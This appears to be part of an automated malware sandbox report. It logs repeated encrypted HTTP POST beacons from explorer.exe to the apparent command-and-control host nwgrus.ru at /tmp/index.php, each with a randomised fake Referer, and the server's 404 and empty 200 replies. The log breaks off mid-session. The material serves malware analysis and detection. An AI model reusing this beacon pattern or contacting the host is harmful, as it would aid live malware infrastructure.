                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.450551116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:28.617679119 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://vdgnwysksin.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 122
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:28.617714882 CEST122OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2b 0d df 8f
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu+9Wo|KW5n8IpLc
                                                            Oct 11, 2024 06:37:29.865607023 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.450552116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:29.875168085 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mnxigvfksbogudg.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 335
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:29.875199080 CEST335OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 35 31 fe a6
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu51RaZEke_iY9_e`+(eUI%X_2<+P:sD<G=w$]Q\'|Z,Khm\D>G5s
                                                            Oct 11, 2024 06:37:31.120218039 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:30 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.450553116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:31.128701925 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://kixruudymeg.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 188
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:31.128739119 CEST188OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4e 49 ad ab
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuNIU6ztXt3L?^b{UL&dn~.-Lv9]U`96p M@Vr6I
                                                            Oct 11, 2024 06:37:32.624485970 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.450554116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:32.636657000 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://noqnaadfmcqiqh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 286
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:32.636657000 CEST286OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 75 44 e0 e8
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuuDWFZE3w,6w$ZBE#9CG@I6APg)/1n=YW25q\=Nn'U[H\FFhWs
                                                            Oct 11, 2024 06:37:33.887737036 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:33 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.450555116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:33.895883083 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xgcqobnogyn.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 212
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:33.895915985 CEST212OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 01 f9 fd
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuDj=nkfSVQ0&=/bI{bB! b?AfrjvyJ eH?tl=S1]`8A
                                                            Oct 11, 2024 06:37:35.170355082 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:34 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.450556116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:35.178427935 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://tkdovmgcqkpkau.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 354
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:35.178427935 CEST354OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 76 2e d9 f7
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuv.n`T`4Y2<sMe"7W6GW,kM7*^,L0w\]ta0(5F0+oayzPiP"\)
                                                            Oct 11, 2024 06:37:36.455070019 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:36 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.450557116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:36.468993902 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jdcljhdxiwgilrm.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 321
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:36.469016075 CEST321OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7a 22 ff b6
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuz"XAkBeD [f3*DZMbDBP)]MrWD`34vq|EW'f#Tyc"YE=fd&NS!'
                                                            Oct 11, 2024 06:37:37.717370033 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:37 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.450558116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:37.730607986 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ktpfbekvdosn.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 311
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:37.730640888 CEST311OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 63 3d a0 b9
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuc=Z\U^f>XS?{UZ"N\amMPJ;M}nHNr;sz"+DQxO+ZUzNX{
                                                            Oct 11, 2024 06:37:39.029239893 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:38 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.450559116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:39.037609100 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://egphyymsnbbon.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 279
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:39.037609100 CEST279OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 43 43 d7 bd
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuCCbTace:|0rvFYU'J]$=k=8H\71\1%<xMJ6G/wv<*kA6a8
                                                            Oct 11, 2024 06:37:40.278882980 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.450560116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:40.286746979 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://aedejmbyprcj.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 307
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:40.286782026 CEST307OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 28 37 ca ea
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu(7Mw~L>#RF:$vAfNe1#QY6GE0t"PkQT>EPkePoK0n6RxmTEcr>_J3
                                                            Oct 11, 2024 06:37:41.537832975 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:41 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.450561116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:41.546612978 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hvawqwmqdyhhbuvh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 292
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:41.546637058 CEST292OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 25 43 c2 ee
